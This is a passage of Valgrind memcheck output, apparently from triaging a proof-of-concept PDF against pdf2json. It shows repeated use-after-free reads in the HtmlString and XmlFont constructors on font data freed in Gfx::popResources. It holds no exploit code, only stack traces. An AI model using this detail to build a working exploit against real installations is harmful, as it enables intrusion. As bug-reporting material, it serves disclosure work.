/home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== ==22556== Invalid read of size 8 ==22556== at 0x40325C: HtmlString::HtmlString(GfxState*, double, double, XmlFontAccu*) (ImgOutputDev.cc:86) ==22556== by 0x4036BE: HtmlPage::beginString(GfxState*, GString*) (ImgOutputDev.cc:237) ==22556== by 0x462C57: Gfx::doShowText(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46243E: Gfx::opShowText(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46627C: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Address 0x5b2b058 is 24 bytes inside a block of size 4,584 free'd ==22556== at 0x4C2F24B: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x46C5E3: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46EEC9: GfxFontDict::~GfxFontDict() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x4534F2: GfxResources::~GfxResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467CC3: Gfx::popResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x466309: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Block was alloc'd at ==22556== at 0x4C2E0EF: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x469005: GfxFont::makeFont(XRef*, char*, Ref, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46ECFB: GfxFontDict::GfxFontDict(XRef*, Ref*, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x453380: GfxResources::GfxResources(XRef*, Dict*, GfxResources*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467C63: Gfx::pushResources(Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465DBB: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== ==22556== Invalid read of size 4 ==22556== at 0x41CA4E: GString::getLength() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x48C320: GString::GString(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x406434: XmlFont::XmlFont(GString*, int, double, GfxRGB) (XmlFonts.cc:88) ==22556== by 0x40328C: HtmlString::HtmlString(GfxState*, double, double, XmlFontAccu*) (ImgOutputDev.cc:88) ==22556== by 0x4036BE: HtmlPage::beginString(GfxState*, GString*) (ImgOutputDev.cc:237) ==22556== by 0x462C57: Gfx::doShowText(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46243E: Gfx::opShowText(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46627C: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Address 0x5b2af50 is 0 bytes inside a block of size 16 free'd ==22556== at 0x4C2F24B: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x46947A: GfxFont::~GfxFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C587: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C5D7: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46EEC9: GfxFontDict::~GfxFontDict() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x4534F2: GfxResources::~GfxResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467CC3: Gfx::popResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x466309: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Block was alloc'd at ==22556== at 0x4C2E0EF: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x468F7E: GfxFont::makeFont(XRef*, char*, Ref, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46ECFB: GfxFontDict::GfxFontDict(XRef*, Ref*, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x453380: GfxResources::GfxResources(XRef*, Dict*, GfxResources*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467C63: Gfx::pushResources(Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465DBB: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== ==22556== Invalid read of size 8 ==22556== at 0x409098: GString::getCString() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x48C354: GString::GString(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x406434: XmlFont::XmlFont(GString*, int, double, GfxRGB) (XmlFonts.cc:88) ==22556== by 0x40328C: HtmlString::HtmlString(GfxState*, double, double, XmlFontAccu*) (ImgOutputDev.cc:88) ==22556== by 0x4036BE: HtmlPage::beginString(GfxState*, GString*) (ImgOutputDev.cc:237) ==22556== by 0x462C57: Gfx::doShowText(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46243E: Gfx::opShowText(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46627C: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Address 0x5b2af58 is 8 bytes inside a block of size 16 free'd ==22556== at 0x4C2F24B: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x46947A: GfxFont::~GfxFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C587: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C5D7: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46EEC9: GfxFontDict::~GfxFontDict() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x4534F2: GfxResources::~GfxResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467CC3: Gfx::popResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x466309: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Block was alloc'd at ==22556== at 0x4C2E0EF: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x468F7E: GfxFont::makeFont(XRef*, char*, Ref, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46ECFB: GfxFontDict::GfxFontDict(XRef*, Ref*, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x453380: GfxResources::GfxResources(XRef*, Dict*, GfxResources*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467C63: Gfx::pushResources(Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465DBB: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== ==22556== Invalid read of size 8 ==22556== at 0x4C326C8: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x48C36D: GString::GString(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x406434: XmlFont::XmlFont(GString*, int, double, GfxRGB) (XmlFonts.cc:88) ==22556== by 0x40328C: HtmlString::HtmlString(GfxState*, double, double, XmlFontAccu*) (ImgOutputDev.cc:88) ==22556== by 0x4036BE: HtmlPage::beginString(GfxState*, GString*) (ImgOutputDev.cc:237) ==22556== by 0x462C57: Gfx::doShowText(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46243E: Gfx::opShowText(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46627C: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Address 0x5b2afa0 is 0 bytes inside a block of size 16 free'd ==22556== at 0x4C2F74B: operator delete[](void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x48C698: GString::~GString() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x469472: GfxFont::~GfxFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C587: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C5D7: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46EEC9: GfxFontDict::~GfxFontDict() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x4534F2: GfxResources::~GfxResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467CC3: Gfx::popResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x466309: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Block was alloc'd at ==22556== at 0x4C2E80F: operator new[](unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x48E420: GString::resize(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x48C1C7: GString::GString(char const*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x468F8C: GfxFont::makeFont(XRef*, char*, Ref, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46ECFB: GfxFontDict::GfxFontDict(XRef*, Ref*, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x453380: GfxResources::GfxResources(XRef*, Dict*, GfxResources*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467C63: Gfx::pushResources(Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465DBB: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== ==22556== Invalid read of size 2 ==22556== at 0x4C32720: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x48C36D: GString::GString(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x406434: XmlFont::XmlFont(GString*, int, double, GfxRGB) (XmlFonts.cc:88) ==22556== by 0x40328C: HtmlString::HtmlString(GfxState*, double, double, XmlFontAccu*) (ImgOutputDev.cc:88) ==22556== by 0x4036BE: HtmlPage::beginString(GfxState*, GString*) (ImgOutputDev.cc:237) ==22556== by 0x462C57: Gfx::doShowText(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46243E: Gfx::opShowText(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46627C: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Address 0x5b2afa8 is 8 bytes inside a block of size 16 free'd ==22556== at 0x4C2F74B: operator delete[](void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x48C698: GString::~GString() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x469472: GfxFont::~GfxFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C587: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C5D7: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46EEC9: GfxFontDict::~GfxFontDict() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x4534F2: GfxResources::~GfxResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467CC3: Gfx::popResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x466309: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Block was alloc'd at ==22556== at 0x4C2E80F: operator new[](unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x48E420: GString::resize(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x48C1C7: GString::GString(char const*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x468F8C: GfxFont::makeFont(XRef*, char*, Ref, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46ECFB: GfxFontDict::GfxFontDict(XRef*, Ref*, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x453380: GfxResources::GfxResources(XRef*, Dict*, GfxResources*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467C63: Gfx::pushResources(Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465DBB: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== ==22556== Invalid read of size 1 ==22556== at 0x4C32758: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x48C36D: GString::GString(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x406434: XmlFont::XmlFont(GString*, int, double, GfxRGB) (XmlFonts.cc:88) ==22556== by 0x40328C: HtmlString::HtmlString(GfxState*, double, double, XmlFontAccu*) (ImgOutputDev.cc:88) ==22556== by 0x4036BE: HtmlPage::beginString(GfxState*, GString*) (ImgOutputDev.cc:237) ==22556== by 0x462C57: Gfx::doShowText(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46243E: Gfx::opShowText(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46627C: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Address 0x5b2afac is 12 bytes inside a block of size 16 free'd ==22556== at 0x4C2F74B: operator delete[](void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x48C698: GString::~GString() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x469472: GfxFont::~GfxFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C587: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C5D7: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46EEC9: GfxFontDict::~GfxFontDict() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x4534F2: GfxResources::~GfxResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467CC3: Gfx::popResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x466309: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Block was alloc'd at ==22556== at 0x4C2E80F: operator new[](unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x48E420: GString::resize(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x48C1C7: GString::GString(char const*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x468F8C: GfxFont::makeFont(XRef*, char*, Ref, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46ECFB: GfxFontDict::GfxFontDict(XRef*, Ref*, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x453380: GfxResources::GfxResources(XRef*, Dict*, GfxResources*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467C63: Gfx::pushResources(Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465DBB: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: 